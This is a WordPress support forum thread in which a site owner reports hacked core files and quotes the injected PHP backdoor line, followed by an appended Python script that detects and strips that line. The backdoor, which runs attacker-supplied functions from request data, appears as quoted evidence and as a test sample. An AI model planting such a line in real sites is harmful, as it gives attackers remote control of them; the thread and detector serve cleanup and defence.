• Resolved himagarwal

    (@himagarwal)


    One of my websites was compromised. Since it only had like 5 pages, I saved all the pages' text, completely deleted the files & database, and installed everything from the start. I also changed the database username and pass but didn’t change the addon/FTP pass.

    After installing Wordfence, Sucuri & Acunetix WP Security and configuring these plugins, I thought I had pretty much secured my website. The site is hosted at HostGator.

    But to my surprise, within like 24 hours 4 of my core files were modified

    Critical Problems:
    * WordPress core file modified: wp-admin/edit-form-advanced.php
    * WordPress core file modified: wp-includes/date.php
    * WordPress core file modified: wp-includes/ms-default-filters.php

    Warnings:
    * Modified plugin file: wp-content/plugins/add-tags-and-category-to-page/includes/tcp_footer.php

    When checked through Wordfence, it showed that all the files have an added line at the top, which is:

    <?php if(@md5($_SERVER['HTTP_PATH'])==='5cd2973f835de94b560b62465d5a37f3'){ @extract($_REQUEST); @die($stime($mtime)); } ?>

    I am pretty sure this is a hack, but I am not getting how they are getting through my site when everything is up-to-date and only freely available plugins have been installed (nothing privacy of any sort).

    Also, can someone decode that code… what is it about… and how can I protect the site… I am really concerned.. though I have now also changed the FTP/addon password.

    Please help me!

    https://ww.wp.xz.cn/plugins/wordfence/

Viewing 5 replies - 1 through 5 (of 5 total)
  • The default FTP password looks like the original vulnerability to me. You’ll definitely want to get rid of that line of code. Run another scan. Wordfence should give you the option to repair the file.

    http://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,
    Brian

    Thread Starter himagarwal

    (@himagarwal)

    Thank you for your reply Brian!

    I was not using the default FTP password created by cPanel. I had the FTP/addon password set to something of my own, alphanumeric, like a year ago. (I think the default cPanel password would be tougher to break as it uses special characters in a wild manner.)

    I did everything from scratch – new files, new database, new database user/pass, new WP user / login details etc. but I didn’t change the FTP pass. So, maybe you are correct regarding a hack via FTP but I still doubt it..

    Though, now I have changed the FTP password & cPanel password. I have shared hosting at HostGator. I’ll let you know if weird things don’t happen in the coming days!

    Also make sure and check the option to “scan images as executable”. I bet there’s something in your uploads folder.

    tim

    Thread Starter himagarwal

    (@himagarwal)

    Thank you Tim for replying.

    I did check “scan images as executable” earlier but nothing came up, so I went through the files manually and didn’t find anything suspicious. I cannot confirm this, but I do feel that it was not done that way.

    Haven’t encountered anything after that till now, so MAYBE the sites are secured now.

    Regards,
    Himanshu

    We hope so too. 🙂

    I’ll mark this resolved for the present. Feel free to reopen or open a new post if problems show up again.

    tim


The topic ‘Files Being Modified With Following Code’ is closed to new replies.
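A detection sketch for the line quoted in the first post, added here as an example; it is not part of the thread and not Wordfence's code. It generalizes beyond the one quoted line to any 32-hex digest and any `$_SERVER` key, and the names `check_source` and `scan_tree` are hypothetical.

```python
import re
from pathlib import Path

# Quotes in the thread's copy of the line are typographic; map them 1:1 to ASCII
# so match offsets stay valid against the original text.
QUOTES = str.maketrans({"‘": "'", "’": "'", "′": "'", "“": '"', "”": '"'})

# Leading <?php ... ?> block that compares md5() of a $_SERVER value with a fixed
# 32-hex digest, then extract()s request data and calls a function by variable name.
INJECTED = re.compile(
    r"""\A\s*<\?php\s+if\s*\(\s*@?md5\s*\(\s*\$_SERVER\s*\[[^\]]+\]\s*\)\s*===?\s*
        ['"][0-9a-f]{32}['"]\s*\)\s*\{
        [^}]*?extract\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\)
        [^}]*?\$\w+\s*\(\s*\$\w+
        [^}]*\}\s*\?>""",
    re.IGNORECASE | re.VERBOSE,
)

# Constructed sample: the line as it appears in the post, followed by a stand-in
# for the start of a legitimate core file.
SAMPLE = (
    "<?php if(@md5($_SERVER[‘HTTP_PATH’])===’5cd2973f835de94b560b62465d5a37f3′){ "
    "@extract($_REQUEST); @die($stime($mtime)); } ?>\n"
    "<?php\n/** Constructed stand-in for a core file. */\n"
)


def check_source(text):
    """Return (is_injected, text_without_the_injected_block) for one file's contents."""
    m = INJECTED.match(text.translate(QUOTES))
    if not m:
        return False, text
    return True, text[m.end():].lstrip("\r\n")


def scan_tree(root):
    """Return sorted relative paths of *.php files under root that start with the block."""
    hits = []
    for path in Path(root).rglob("*.php"):
        head = path.read_text(encoding="utf-8", errors="replace")[:2048]
        if check_source(head)[0]:
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


if __name__ == "__main__":
    print(check_source(SAMPLE)[0])
```

A match shows that a file was altered, not how the write access was obtained; the replies in the thread point to the FTP password and the uploads folder as the places to check.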